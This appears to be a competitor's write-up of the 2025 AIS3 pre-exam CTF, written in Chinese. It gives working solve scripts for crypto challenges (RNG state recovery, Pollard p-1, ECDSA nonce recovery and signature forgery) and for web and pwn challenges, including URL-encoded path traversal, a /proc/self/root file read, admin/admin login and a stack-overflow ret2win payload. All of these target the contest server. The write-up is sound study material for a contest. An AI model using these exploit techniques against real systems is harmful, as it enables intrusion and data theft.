2025 AIS3 pre-exam

[Welcome]

[Stream]

題目

1
from random import getrandbits
2
import os
3
from hashlib import sha512
4
from flag import flag
5

6
def hexor(a: bytes, b: int):
7
    return hex(int.from_bytes(a)^b**2)
8

9
for i in range(80):
10
    print(hexor(sha512(os.urandom(True)).digest(), getrandbits(256)))
11

12
print(hexor(flag, getrandbits(256)))

他會輸出前 80 個 $sha512(os.urandom(1)) \oplus r_i \\^2$ 最後一行是 $flag\ \oplus \ r\_flag^2$

sha512(os.urandom(1)) 只有 256 種可能，可以暴力解還原前 80 個 r_i：對每個 cipher，嘗試 cipher ^ digest[b]，檢查是否為平方

1
import hashlib, math, random, sys
2
def untemper(y):
3
    y ^= y >> 18
4
    y ^= (y << 15) & 0xEFC60000
5
    for _ in range(7): y ^= (y << 7) & 0x9D2C5680
6
    for _ in range(3): y ^= y >> 11
7
    return y & 0xFFFFFFFF
8
ciphers = [int(l.strip(), 16) for l in open(sys.argv[1])]
9
digest = [int.from_bytes(hashlib.sha512(bytes([b])).digest(), 'big') for b in range(256)]
10
rs = []
11
for c in ciphers[:80]:
12
    for d in digest:
13
        sq = c ^ d
14
        r = math.isqrt(sq)
15
        if r*r == sq:
16
            rs.append(r); break
17
words = [(r >> (32*i)) & 0xFFFFFFFF for r in rs for i in range(8)]
18
state = (3, (2147483648, *[untemper(w) for w in words[:623]], 1), None)
19
rng = random.Random(); rng.setstate(state)
20
for _ in range(80): rng.getrandbits(256)
21
r_flag = rng.getrandbits(256)
22
flag_int = ciphers[80] ^ (r_flag * r_flag)
23
print(flag_int.to_bytes((flag_int.bit_length()+7)//8, 'big').decode())

1
[18:26:42] ~/Downloads/dist-stream-2ee294b153c47451391a447691e5caa7d85d5d0e ➜ python3 2.py output.txt
2
AIS3{no_more_junks...plz}

[Hill]

題目

1
import numpy as np
2

3
p = 251
4
n = 8
5

6

7
def gen_matrix(n, p):
8
    while True:
9
        M = np.random.randint(0, p, size=(n, n))
10
        if np.linalg.matrix_rank(M % p) == n:
11
            return M % p
12

13
A = gen_matrix(n, p)
14
B = gen_matrix(n, p)
15

16
def str_to_blocks(s):
17
    data = list(s.encode())
18
    length = ((len(data) - 1) // n) + 1
19
    data += [0] * (n * length - len(data))  # padding
20
    blocks = np.array(data, dtype=int).reshape(length, n)
21
    return blocks
22

23
def encrypt_blocks(blocks):
24
    C = []
25
    for i in range(len(blocks)):
26
        if i == 0:
27
            c = (A @ blocks[i]) % p
28
        else:
29
            c = (A @ blocks[i] + B @ blocks[i-1]) % p
30
        C.append(c)
31
    return C
32

33
flag = "AIS3{Fake_FLAG}"
34
blocks = str_to_blocks(flag)
35
ciphertext = encrypt_blocks(blocks)
36

37
print("Encrypted flag:")
38
for c in ciphertext:
39
    print(c)
40

41
t = input("input: ")
42
blocks = str_to_blocks(t)
43
ciphertext = encrypt_blocks(blocks)
44
for c in ciphertext:
45
    print(c)

連上後會先印出某個矩陣矩陣

矩陣 $A \in \mathbb{Z}_p^{n \times n}$ ，其中 $n = 8$
矩陣 $B \in \mathbb{Z}_p^{n \times n}$

將明文切成 8 bit 組一組的向量 $m_0, m_1, \dots, m_{L-1}$

加密規則如下：

$\begin{cases} c_0 = A \cdot m_0 \\ c_i = A \cdot m_i + B \cdot m_{i-1}, & \text{for } \ i \geq 1\end{cases}$

對於每一列 $\text{row} = 0, 1, \dots, 7$ ，有：

$\underbrace{\bigl(\mathbf{m}_i\bigr)^\top}_{1 \times n}\!\!\mathbf{A}_{r,*}^{\!\top}\;+\;\underbrace{\bigl(\mathbf{m}_{i-1}\bigr)^\top}_{1 \times n}\!\!\mathbf{B}_{r,*}^{\!\top}\;=\;\mathbf{c}_i[r]\pmod{p}$

求 $A^-1$

$\mathbf{A}^{-1} = \bigl[\,\mathbf{A} \mid \mathbf{I}\,\bigr] \xrightarrow{} \bigl[\,\mathbf{I} \mid \mathbf{A}^{-1}\,\bigr] \pmod{p}$

$\mathbf{m}_0 = \mathbf{A}^{-1} \mathbf{c}_0 \pmod{p}$

$\mathbf{m}_i = \mathbf{A}^{-1} \left(\mathbf{c}_i - \mathbf{B} \mathbf{m}_{i-1} \right) \pmod{p}$

$\mathbb{1}_{\{i \ge 1\}} = \begin{cases} 0, & i = 0 \\ 1, & i \ge 1 \end{cases}$

$\mathbf{M} = \begin{bmatrix} \mathbf{m}_0 \\ \mathbf{m}_1 \\ \vdots \\ \mathbf{m}_k \end{bmatrix} \in \mathbb{Z}_p^{(k+1) \times n}$

$\mathbf{p} = \mathrm{vec}(\mathbf{M}) = \begin{bmatrix} m_{0,0} \\ \vdots \\ m_{0,n-1} \\ m_{1,0} \\ \vdots \\ m_{k,n-1} \end{bmatrix} \in \mathbb{Z}_p^N, \quad N = n(k+1)$

$j = \max\{\, j \mid \mathbf{p}_j \ne 0 \,\}, \quad {\mathbf{p}} = ( \mathbf{p}_0, \dots, \mathbf{p}_{j^{\star}} )$

${\text{FLAG} = \mathrm{ASCII}({\mathbf{p}})}$

1
from pwn import *
2
import numpy as np
3
import random
4

5
p_mod ,n ,L= 251, 8, 20
6
def mod_inv(a):
7
    return pow(int(a) % p_mod, p_mod - 2, p_mod)
8

9
def gauss_solve(mat, vec):
10
    mat = mat.copy() % p_mod
11
    vec = vec.copy() % p_mod
12
    r, c = mat.shape
13
    row = 0
14
    for col in range(c):
15
        pivot = next((i for i in range(row, r) if mat[i, col]), None)
16
        if pivot is None:
17
            continue
18
        if pivot != row:
19
            mat[[row, pivot]] = mat[[pivot, row]]
20
            vec[[row, pivot]] = vec[[pivot, row]]
21
        inv = mod_inv(mat[row, col])
22
        mat[row] = (mat[row] * inv) % p_mod
23
        vec[row] = (vec[row] * inv) % p_mod
24
        for i in range(r):
25
            if i == row:
26
                continue
27
            factor = mat[i, col]
28
            if factor:
29
                mat[i] = (mat[i] - factor * mat[row]) % p_mod
30
                vec[i] = (vec[i] - factor * vec[row]) % p_mod
31
        row += 1
32
        if row == r:
33
            break
34

35
    sol = np.zeros(c, dtype=int)
36
    for i in range(r):
37
        leading = next((j for j in range(c) if mat[i, j]), None)
38
        if leading is not None:
39
            sol[leading] = vec[i] % p_mod
40
    return sol
41

42
io = remote('chals1.ais3.org', 18000)
43
io.recvuntil(b"Encrypted flag:\n")
44

45
data = io.recvuntil(b"input: ")
46
lines = data.decode().splitlines()
47

48
flag_ct = []
49
for l in lines:
50
    l = l.strip()
51
    if l.startswith('['):
52
        nums = [int(x) for x in l.strip('[]').split()]
53
        flag_ct.append(nums)
54

55
flag_ct = np.array(flag_ct, dtype=int) % p_mod
56

57
plain_bytes = [random.randint(33, 126) for _ in range(L * n)]
58
my_plain    = "".join(chr(b) for b in plain_bytes)
59
io.sendline(my_plain.encode())
60

61
my_ct = []
62
for _ in range(L):
63
    line = io.recvline().strip().decode()
64
    nums = [int(x) for x in line.strip("[]").split()]
65
    my_ct.append(nums)
66
my_ct = np.array(my_ct, dtype=int) % p_mod
67
io.close()
68

69
my_blocks = np.array(plain_bytes, dtype=int).reshape(L, n) % p_mod
70

71
A = np.zeros((n, n), dtype=int)
72
B = np.zeros((n, n), dtype=int)
73
for row in range(n):
74
    mat = np.zeros((L, 2 * n), dtype=int)
75
    rhs = my_ct[:, row]
76
    for i in range(L):
77
        mat[i, :n] = my_blocks[i]
78
        if i > 0:
79
            mat[i, n:] = my_blocks[i - 1]
80
    sol = gauss_solve(mat, rhs)
81
    A[row] = sol[:n]
82
    B[row] = sol[n:]
83

84
A_aug = np.concatenate([A, np.eye(n, dtype=int)], axis=1) % p_mod
85
for col in range(n):
86
    pivot = next(i for i in range(col, n) if A_aug[i, col])
87
    if pivot != col:
88
        A_aug[[col, pivot]] = A_aug[[pivot, col]]
89
    inv = mod_inv(A_aug[col, col])
90
    A_aug[col] = (A_aug[col] * inv) % p_mod
91
    for r in range(n):
92
        if r == col:
93
            continue
94
        factor = A_aug[r, col]
95
        if factor:
96
            A_aug[r] = (A_aug[r] - factor * A_aug[col]) % p_mod
97
A_inv = A_aug[:, n:] % p_mod
98

99
m_blocks = []
100
m0 = (A_inv @ flag_ct[0]) % p_mod
101
m_blocks.append(m0)
102
for i in range(1, len(flag_ct)):
103
    tmp = (flag_ct[i] - (B @ m_blocks[i - 1]) % p_mod) % p_mod
104
    mi  = (A_inv @ tmp) % p_mod
105
    m_blocks.append(mi)
106
m_blocks = np.array(m_blocks, dtype=int)
107

108
plain_nums = m_blocks.flatten().tolist()
109
while plain_nums and plain_nums[-1] == 0:
110
    plain_nums.pop()
111
flag_bytes = bytes(plain_nums)
112
print(flag_bytes.decode())

1
[13:44:07] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/237.py"
2
[+] Opening connection to chals1.ais3.org on port 18000: Done
3
[*] Closed connection to chals1.ais3.org port 18000
4
AIS3{b451c_h1ll_c1ph3r_15_2_3z_f0r_u5}

[Random_RSA]

題目

1
from Crypto.Util.number import getPrime, bytes_to_long
2
from sympy import nextprime
3
from gmpy2 import is_prime
4

5
FLAG = b"AIS3{Fake_FLAG}"
6

7
a = getPrime(512)
8
b = getPrime(512)
9
m = getPrime(512)
10
a %= m
11
b %= m
12
seed = getPrime(300)
13

14
rng = lambda x: (a*x + b) % m
15

16

17
def genPrime(x):
18
    x = rng(x)
19
    k=0
20
    while not(is_prime(x)):
21
        x = rng(x)
22
    return x
23

24
p = genPrime(seed)
25
q = genPrime(p)
26

27
n = p * q
28
e = 65537
29
m_int = bytes_to_long(FLAG)
30
c = pow(m_int, e, n)
31

32
# hint
33
seed = getPrime(300)
34
h0 = rng(seed)
35
h1 = rng(h0)
36
h2 = rng(h1)
37

38
with open("output.txt", "w") as f:
39
    f.write(f"h0 = {h0}\n")
40
    f.write(f"h1 = {h1}\n")
41
    f.write(f"h2 = {h2}\n")
42
    f.write(f"M = {m}\n")
43
    f.write(f"n = {n}\n")
44
    f.write(f"e = {e}\n")
45
    f.write(f"c = {c}\n")

$\text{rng}(x)=a\,x+b \pmod{m}\qquad$ $m=\text{512‑bit prime}$

seed = getPrime(300)
$p=$ $\text{rng}^k(\text{seed}))$
$q=$ $(\text{rng}^\ell(p))$
$RSA$ ： $(n=pq,\;e=65537,\;c=\text{cipher})$

有

$\begin{cases}h_1 \equiv a\,h_0+b \pmod m\\ h_2 \equiv a\,h_1+b \pmod m \end{cases}$

消元可得

$\boxed{\,a \equiv (h_1-h_2)\,(h_0-h_1)^{-1} \pmod m\,},$ $\qquad$ $\boxed{\,b \equiv h_1-a\,h_0 \pmod m\,}$

對任意 $(t\ge1)$

$\text{rng}^t(x)\equiv A_t\,x+B_t\pmod m,\quad \begin{cases} A_t=a^t\bmod m,\\[6pt] \displaystyle B_t=b\,\frac{a^t-1}{a-1}\bmod m \end{cases}$

令 $(t=k)$ 使 $(\text{rng}^k(\text{seed})=p)$

設 $(s=\text{seed})$ ，則

$p \equiv A\,s+B \pmod m \quad\Longrightarrow\quad s \equiv (p-B)A^{-1}\pmod m.$

消去 (s)：得到二次同餘

$(2Ap+B)^2 \equiv B^2+4An \pmod m$

記
$\Delta = B^2+4A n \pmod m$

則 (p) 為

$\boxed{\,p \equiv \dfrac{-B \pm \sqrt{\Delta}}{2A}\pmod m\,}$

只要 $(\Delta)$ 在模 $(m)$ 下即可取根

1
from sympy import sqrt_mod, mod_inverse, isprime
2
from Crypto.Util.number import long_to_bytes
3

4
h0 = 2907912348071002191916245879840138889735709943414364520299382570212475664973498303148546601830195365671249713744375530648664437471280487562574592742821690
5
h1 = 5219570204284812488215277869168835724665994479829252933074016962454040118179380992102083718110805995679305993644383407142033253210536471262305016949439530
6
h2 = 3292606373174558349287781108411342893927327001084431632082705949610494115057392108919491335943021485430670111202762563173412601653218383334610469707428133
7
m = 9231171733756340601102386102178805385032208002575584733589531876659696378543482750405667840001558314787877405189256038508646253285323713104862940427630413
8
n = 20599328129696557262047878791381948558434171582567106509135896622660091263897671968886564055848784308773908202882811211530677559955287850926392376242847620181251966209002883852930899738618123390979377039185898110068266682754465191146100237798667746852667232289994907159051427785452874737675171674258299307283
9
e = 65537
10
c = 13859390954352613778444691258524799427895807939215664222534371322785849647150841939259007179911957028718342213945366615973766496138577038137962897225994312647648726884239479937355956566905812379283663291111623700888920153030620598532015934309793660829874240157367798084893920288420608811714295381459127830201
11

12

13
a = (h1 - h2) * mod_inverse(h0 - h1, m) % m
14
b = (h1 - a * h0) % m
15
inv_am1 = mod_inverse((a - 1) % m, m)
16

17
for t in range(1, 600):
18
    A = pow(a, t, m)
19
    B = b * (A - 1) * inv_am1 % m
20
    Δ  = (B*B + 4*A*n) % m
21
    roots = sqrt_mod(Δ, m, all_roots=True)
22
    for r in roots:
23
        p = ((-B + r) * mod_inverse(2*A, m)) % m
24
        if p and n % p == 0 and isprime(p):
25
            q = n // p
26
            assert isprime(q)
27
            φ = (p-1)*(q-1)
28
            d = mod_inverse(e, φ)
29
            flag = long_to_bytes(pow(c, d, n))
30
            print(flag.decode())
31
            exit(0)

1
[14:35:43] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/233.py"
2
AIS3{1_d0n7_r34lly_why_1_d1dn7_u53_637pr1m3}

[Happy Happy Factoring]

題目

1
import random
2
from functools import reduce
3

4
from gmpy2 import is_prime
5

6

7
prime_list = [num for num in range(3, 5000) if is_prime(num)]
8

9

10
def get_william_prime():
11
    while True:
12
        li = [2] + random.choices(prime_list, k=85)
13
        n = reduce(lambda x, y: x * y, li)
14
        if is_prime(n - 1):
15
            return n - 1
16

17

18
def get_pollard_prime():
19
    while True:
20
        li = [2] + random.choices(prime_list, k=85)
21
        n = reduce(lambda x, y: x * y, li)
22
        if is_prime(n + 1):
23
            return n + 1
24

25

26
def get_fermat_prime():
27
    a = random.getrandbits(1024)
28
    if a % 2 != 0:
29
        a += 1
30
    check = 0
31
    for offset in range(random.getrandbits(512) | 1, 1 << 512 + 1, 2):
32
        if (not check & 1) and is_prime(a + offset):
33
            check |= 1
34
            p = a + offset
35
        if (not check & 2) and is_prime(a - offset):
36
            check |= 2
37
            q = a - offset
38
        if check == 3:
39
            return p, q
40

41

42
def main():
43
    wi = get_william_prime()
44
    po = get_pollard_prime()
45
    fp, fq = get_fermat_prime()
46

47
    n = wi * po * po * fp * fq
48
    e = 0x10001
49
    m = int.from_bytes(open('flag.txt').read().strip().encode())
50
    c = pow(m, e, n)
51

52
    print(f'n = {n}')
53
    print(f'e = {e}')
54
    print(f'c = {c}')
55

56
main()

題目把 4 個大質數相乘得到
$n = w_i \; p_o^{\,2} \; f_p \; f_q$

對於質數p，如果p-1的所有質因數都較小，則可以通過以下步驟找到p：

選擇底數a
計算 a^B mod n，其中B是所有小質數的乘積
如果p-1的所有因數都包含在B中，則 a^B ≡ 1 (mod p)
計算 gcd(a^B - 1, n) 可能得到p

對於質數p，如果 $p - 1 = q_1^{\alpha_1} \times q_2^{\alpha_2} \times \cdots \times q_k^{\alpha_k}$

則對於底數a：

$a^{p-1} \equiv 1 \pmod{p}$

如果 $B = \mathrm{lcm}(q_1^{\alpha_1},\ q_2^{\alpha_2},\ \ldots,\ q_k^{\alpha_k})$ ，則：

$a^B \equiv 1 \pmod{p}$ ， $\gcd(a^B - 1,\ n) = p$

1
import re, math
2
n = 60763718988363732014714378240503239363378716344786064427633103900163714795049031343530976333384849092574531088958278531796791269274033045247468279778697834271056697703384043345478274417830331218076647357163447985776813989427400170525437678547826499412542686651017218028970864190216904615610527825259880112714553787804820022215890969437398474372702507063412690704689550295715710210726663486141414839866746195390190050689478793788994971113120247044980308444816728343285377217719743417243597984030508281943509471779819738142587401185391525828957277332050173790712364630350364573645269670566599757124924556318618780988680189777327076706459707684684212592008631793816662912108065408593909988525347442925181041282276218509071711541277729368738735764243654195687411950100527148736266697290008653570361567103718692686950265823409008150425223699459852898223162147029064447737730602794595138107108115161225211304281588196101442541064849330085624077639919266218475926019026834286095322529307797803560019118617515335223076631003247439277523058831709125266949216817874124236017467949448675716346763692924023726148784017135614973119630683596746148387050812840110466838283975867125038922845823807931521243892970213719547931807222621641732942788807438874234021460457789662655868012096318135427733535828701239344723536380874649435986485519446498010249439129416294059581506089078379364874801633348823482500982032017362540718382857218498839339
3
e = 65537
4
c = 44207030878602255093439727713627529424714536888513933329918295258695649333115968449370359700222302579245312436480617326596647245058051575370999951904443151550015706074625370328401332779076604686192843031449186235749865643368166253840337277509707994397801878226500358006463024635087435969538998524734582405866525600851546459050191793239073846810455635211879914050737467404026533874103858418973673243458902849516794733035491504110489194944517745006206578407001620379259037944572489812890427482523341875844231406658507757087786915450447369790738422106207343811320979464959215733209780327553156828306906699830103249980426322575134388451893085145613033052707119244509600245343514769051601842478130345500737780120982516001378114355893400613318479527209307727381442878249151936468300312623822839419034585228514262658066842576813177085447513589259064467260172762603680019928473807935131716584215553191881403885379486263800885157417935351355285318307493812608156009093176418157547185476076384813081081655591478637089927732990897838102722736056096469961634469383933144558941569830176969764313728115821455037916103169727305546266609284138398242237907130652437778206322442252293263897704265426827967602427841795290642868172013365981708186335407114033847578653977681421086305327283866009608036787400010585809721949312065234506464271259806098824737010873785025492695022775753403396509548322949271103192949782516909378429902333959165240991
5

6
def primes_upto(m=5000):
7
    sieve = bytearray(b"\x01") * (m + 1)
8
    sieve[0:2] = b"\x00\x00"
9
    for i in range(2, int(m ** 0.5) + 1):
10
        if sieve[i]:
11
            sieve[i * i : m + 1 : i] = b"\x00" * ((m - i * i) // i + 1)
12
    return [i for i in range(2, m + 1) if sieve[i]]
13

14
SMALL_PRIMES = primes_upto()
15

16
def pollard_pm1(N, rounds=128, bases=(2, 3, 5, 7, 11, 13, 17, 19)):
17
    for a0 in bases:
18
        a = a0
19
        for q in SMALL_PRIMES:
20
            for _ in range(rounds):
21
                a = pow(a, q, N)
22
        g = math.gcd(a - 1, N)
23
        if 1 < g < N:
24
            return g
25
    return None
26

27
def invmod(a, m):
28
    return pow(a, -1, m)
29

30
def extract_n_e_c(text):
31
    n = int(re.search(r'n\s*=\s*(\d+)', text).group(1))
32
    e = int(re.search(r'e\s*=\s*(\d+)', text).group(1))
33
    c = int(re.search(r'c\s*=\s*(\d+)', text).group(1))
34
    return n, e, c
35

36

37
p = pollard_pm1(n)
38
if n % (p * p):
39
    r = math.isqrt(p)
40
    if r * r == p and n % (r * r) == 0:
41
        p = r
42
assert n % (p * p) == 0
43
d = invmod(e, p - 1)
44
m = pow(c, d, p)
45
msg = m.to_bytes((m.bit_length() + 7) // 8, "big")
46
print(msg.decode())

1
[13:28:13] ~/Downloads/dist-happy-happy-factoring-95b63f1513c5473a8ac6251ce96e1602f81a2121 ➜ /usr/local/bin/python3 /Users/yih_0118/Downloads/dist-happy-happy-factoring-95b63f1513c5473a8ac6251ce96e1602f81a2121/2.py
2
AIS3{H@ppY_#ap9y_CRypT0_F4(7or1n&~~~}

[SlowECDSA]

題目

1
#!/usr/bin/env python3
2

3
import hashlib, os
4
from ecdsa import SigningKey, VerifyingKey, NIST192p
5
from ecdsa.util import number_to_string, string_to_number
6
from Crypto.Util.number import getRandomRange
7
from flag import flag
8

9
FLAG = flag
10

11
class LCG:
12
    def __init__(self, seed, a, c, m):
13
        self.state = seed
14
        self.a = a
15
        self.c = c
16
        self.m = m
17

18
    def next(self):
19
        self.state = (self.a * self.state + self.c) % self.m
20
        return self.state
21

22
curve = NIST192p
23
sk = SigningKey.generate(curve=curve)
24
vk = sk.verifying_key
25
order = sk.curve.generator.order()
26

27
lcg = LCG(seed=int.from_bytes(os.urandom(24), 'big'), a=1103515245, c=12345, m=order)
28

29
def sign(msg: bytes):
30
    h = int.from_bytes(hashlib.sha1(msg).digest(), 'big') % order
31
    k = lcg.next()
32
    R = k * curve.generator
33
    r = R.x() % order
34
    s = (pow(k, -1, order) * (h + r * sk.privkey.secret_multiplier)) % order
35
    return r, s
36

37
def verify(msg: str, r: int, s: int):
38
    h = int.from_bytes(hashlib.sha1(msg.encode()).digest(), 'big') % order
39
    try:
40
        sig = number_to_string(r, order) + number_to_string(s, order)
41
        return vk.verify_digest(sig, hashlib.sha1(msg.encode()).digest())
42
    except:
43
        return False
44

45
example_msg = b"example_msg"
46
print("Available options: get_example, verify")
47

48
while True:
49
    opt = input("Enter option: ").strip()
50

51
    if opt == "get_example":
52
        print(f"msg: {example_msg.decode()}")
53
        example_r, example_s = sign(example_msg)
54
        print(f"r: {hex(example_r)}")
55
        print(f"s: {hex(example_s)}")
56

57
    elif opt == "verify":
58
        msg = input("Enter message: ").strip()
59
        r = int(input("Enter r (hex): ").strip(), 16)
60
        s = int(input("Enter s (hex): ").strip(), 16)
61

62
        if verify(msg, r, s):
63
            if msg == "give_me_flag":
64
                print(FLAG.decode())

ECDSA簽章的產生過程：

$h = \text{SHA1}(\text{msg}) \bmod n$
隨機數： $k$
$R = k \cdot G$
$r = R_x \bmod n$
$s = k^{-1}(h + r \cdot d) \bmod n$

LCG的遞推公式： $X_{n+1} = (a \cdot X_n + c) \bmod m$

題目中的參數：

$a = 1103515245$
$c = 12345$
$m = \text{order}$

對於兩個連續 $(r_0, s_0)$ 和 $(r_1, s_1)$ ，我們有：

$s_0 = k_0^{-1}(h_0 + r_0 \cdot d) \bmod n$

$s_1 = k_1^{-1}(h_1 + r_1 \cdot d) \bmod n$

其中 $k_1 = (a \cdot k_0 + c) \bmod n$ ，且 $h_0 = h_1 = \ ...$

從方程式中消除 $d$

$k_0 = s_0^{-1}(h_0 + r_0 \cdot d) \bmod n \Rightarrow d = (s_0 \cdot k_0 - h_0) \cdot r_0^{-1} \bmod n$

$k_1 = s_1^{-1}(h_1 + r_1 \cdot d) \bmod n \Rightarrow d = (s_1 \cdot k_1 - h_1) \cdot r_1^{-1} \bmod n$

使兩式相等 $(s_0 \cdot k_0 - h_0) \cdot r_0^{-1} = (s_1 \cdot k_1 - h_1) \cdot r_1^{-1} \bmod n$

將 $k_1 = a \cdot k_0 + c$ 和 $h_0 = h_1 = h_{\text{ex}}$ 代入並整理

$s_0 \cdot k_0 \cdot r_1 - h_{\text{ex}} \cdot r_1 = s_1 \cdot (a \cdot k_0 + c) \cdot r_0 - h_{\text{ex}} \cdot r_0 \bmod n$

$s_0 \cdot k_0 \cdot r_1 - h_{\text{ex}} \cdot r_1 = s_1 \cdot a \cdot k_0 \cdot r_0 + s_1 \cdot c \cdot r_0 - h_{\text{ex}} \cdot r_0 \bmod n$

$k_0(s_0 \cdot r_1 - s_1 \cdot a \cdot r_0) = h_{\text{ex}} \cdot r_1 - s_1 \cdot c \cdot r_0 + h_{\text{ex}} \cdot r_0 \bmod n$

$k_0(s_0 \cdot r_1 - s_1 \cdot a \cdot r_0) = h_{\text{ex}}(r_1 - r_0) + s_1 \cdot c \cdot r_0 \bmod n$

設：

$A = s_1 \cdot a \cdot r_0 - s_0 \cdot r_1 \bmod n$
$B = s_1 \cdot c \cdot r_0 + h_{\text{ex}} \cdot (r_1 - r_0) \bmod n$

則： $k_0 = (-B) \cdot A^{-1} \bmod n$

一旦得到 $k_0$ ， $d$ 可以透過以下公式計算：

$d = (s_0 \cdot k_0 - h_{\text{ex}}) \cdot r_0^{-1} \bmod n$

偽造簽章

計算未來的隨機數：

$k_1 = (a \cdot k_0 + c) \bmod n$

$k_2 = (a \cdot k_1 + c) \bmod n$

對 “give_me_flag” 產生簽章：

$h = \mathrm{SHA1}(\text{give\_me\_flag}) \bmod n$

$R = k_2 \cdot G$

$r = R_x \bmod n$

$s = k_2^{-1}(h_{\text{target}} + r \cdot d) \bmod n$

1
from pwn import *
2
import re, hashlib
3
from ecdsa import NIST192p
4
from Crypto.Util.number import inverse
5

6
curve = NIST192p
7
G = curve.generator
8
n = G.order()
9
a, c = 1103515245, 12345
10
h_ex = int.from_bytes(hashlib.sha1(b"example_msg").digest(), 'big') % n
11

12
def recv_pair(io):
13
    io.recvuntil(b"msg:")
14
    io.recvline()
15
    r_line = io.recvline()
16
    s_line = io.recvline()
17
    r = int(re.search(rb"0x[0-9a-f]+", r_line)[0], 16)
18
    s = int(re.search(rb"0x[0-9a-f]+", s_line)[0], 16)
19
    return r, s
20

21
io = remote('chals1.ais3.org', 19000)
22

23
for _ in range(2):
24
    io.recvuntil(b"Enter option:")
25
    io.sendline(b"get_example")
26
    if _ == 0:
27
        r0, s0 = recv_pair(io)
28
    else:
29
        r1, s1 = recv_pair(io)
30

31
A = (a * s1 * r0 - r1 * s0) % n
32
B = (c * s1 * r0 + h_ex * (r1 - r0)) % n
33
k0 = (-B) * inverse(A, n) % n
34
d  = (s0 * k0 - h_ex) * inverse(r0, n) % n
35
print(f"[+] k0 = {k0}")
36
print(f"[+] d  = {d}")
37

38
k1 = (a * k0 + c) % n
39
k2 = (a * k1 + c) % n
40
R  = k2 * G
41
r  = R.x() % n
42
h_target = int.from_bytes(hashlib.sha1(b"give_me_flag").digest(), 'big') % n
43
s  = (inverse(k2, n) * (h_target + r * d)) % n
44

45
io.recvuntil(b"Enter option:")
46
io.sendline(b"verify")
47
io.sendline(b"give_me_flag")
48
io.sendline(hex(r).encode())
49
io.sendline(hex(s).encode())
50

51
io.interactive()

1
[01:00:10] ~/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py ➜ /usr/local/bin/python3 "/Users/yih_0118/Documents/code  MacOS/daily/PLAYGROUND FOLDER/py/236.py"
2
[+] Opening connection to chals1.ais3.org on port 19000: Done
3
[+] k0 = 3517535011547372439667544428981429247283241746564365149642
4
[+] d  = 742592174612735250432633840589015146439226119723506253349
5
[*] Switching to interactive mode
6
 Enter message: Enter r (hex): Enter s (hex): ✅ Correct signature! Here's your flag:
7
AIS3{Aff1n3_nounc3s_c@N_bE_broke_ezily...}
8
Enter option: $
9
[*] Interrupted
10
[*] Closed connection to chals1.ais3.org port 19000

[Tomorin db 🐧]

主要他會redirect

1
package main
2

3
import "net/http"
4

5
func main() {
6
  http.Handle("/", http.FileServer(http.Dir("/app/Tomorin")))
7
  http.HandleFunc("/flag", func(w http.ResponseWriter, r *http.Request) {
8
    http.Redirect(w, r, "https://youtu.be/lQuWN0biOBU?si=SijTXQCn9V3j4Rl6", http.StatusFound)
9
    })
10
    http.ListenAndServe(":30000", nil)
11
}

繞過就好

1
[14:45:19] ~ ➜ curl "http://chals1.ais3.org:30000/flag/..%2fflag"
2
AIS3{G01ang_H2v3_a_c0O1_way!!!_Us3ing_C0NN3ct_M3Th07_L0l@T0m0r1n_1s_cute_D0_yo7_L0ve_t0MoRIN?}

他的users.db可以直接下載到直接看光光

弱密碼admin/admin 直接知道2fa code 就看到了

[Ramen CTF]

去看發票的賣家統編 chal 2

根據qrcode上的資料會找到是 AIS3{樂山溫泉拉麵:蝦拉麵}

[AIS3 Tiny Server - Web / Misc]

慢慢去翻會發現//會看到目錄下的東西 http://chals1.ais3.org:20274//proc/self/root/readable_flag_qnmAwQttOwNaFbe8nVHmJoMwQBJJGnlE↗

AIS3{tInY_We8_53rVeR_W1tH_FILe_8rOWs1n9_a$_@_FeaTUre}

[Welcome to the World of Ave Mujica🌙]

丟ida後的main

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  char buf[143]; // [rsp+0h] [rbp-A0h] BYREF
4
  char s[8]; // [rsp+8Fh] [rbp-11h] BYREF
5
  unsigned __int8 int8; // [rsp+97h] [rbp-9h]
6
  char *v7; // [rsp+98h] [rbp-8h]
7

8
  setvbuf(stdin, 0LL, 2, 0LL);
9
  setvbuf(_bss_start, 0LL, 2, 0LL);
10
  printf("\x1B[2J\x1B[1;1H");
11
  printf("\x1B[31m");
12
  printf("%s", (const char *)banner);
13
  puts(&byte_402A78);
14
  puts(&byte_402AB8);
15
  fgets(s, 8, stdin);
16
  v7 = strchr(s, 10);
17
  if ( v7 )
18
    *v7 = 0;
19
  if ( strcmp(s, "yes") )
20
  {
21
    puts(&byte_402AE8);
22
    exit(1);
23
  }
24
  printf(&byte_402B20);
25
  int8 = read_int8();
26
  printf(&byte_402B41);
27
  read(0, buf, int8);
28
  return 0;
29
}

read_int8() 函數unsigned __int8的時候 -1 時，在 signed 解釋下為 -1 但當轉換為 unsigned __int8會被解釋為 255 當int8 = 255 時，可以寫入 255

1
[rsp+0h]   -> buf[143]     (143 bytes)
2
[rsp+8Fh]  -> s[8]         (8 bytes)
3
[rsp+97h]  -> int8         (1 byte)
4
[rsp+98h]  -> v7           (8 bytes)
5
[rbp+8h]   -> return address

計算 offset：

buf：rsp+0h
return address 位置：rbp+8h
rbp 在 rsp+0xA0h 的位置
所以 offset = 0xA0 + 8 = 168

1
from pwn import *
2

3
context.encoding = 'utf-8'
4
context.log_level = 'debug'
5

6
elf = ELF('./chal')
7
p   = remote('chals1.ais3.org', 60890)
8

9
p.recvuntil('你願意把剩餘的人生交給我嗎?'.encode())
10
p.sendline(b'yes')
11

12
p.recvuntil('告訴我你的名字的長度:'.encode())
13
p.sendline(b'-1')
14

15
offset   = 168
16
win_addr = elf.symbols['Welcome_to_the_world_of_Ave_Mujica']
17
payload  = b'A' * offset + p64(win_addr)
18

19
p.sendafter('告訴我你的名字:'.encode(), payload)
20

21
p.interactive()

1
root@DESKTOP-EL5KGCJ:/mnt/c/Users/User/Downloads/dist-ave-mujica-35b29c89e8867ab33fcb802afcc3488a28c210f1/service# python3 1.py
2
[*] '/mnt/c/Users/User/Downloads/dist-ave-mujica-35b29c89e8867ab33fcb802afcc3488a28c210f1/service/chal'
3
    Arch:       amd64-64-little
4
    RELRO:      Partial RELRO
5
    Stack:      No canary found
6
    NX:         NX enabled
7
    PIE:        No PIE (0x400000)
8
    SHSTK:      Enabled
9
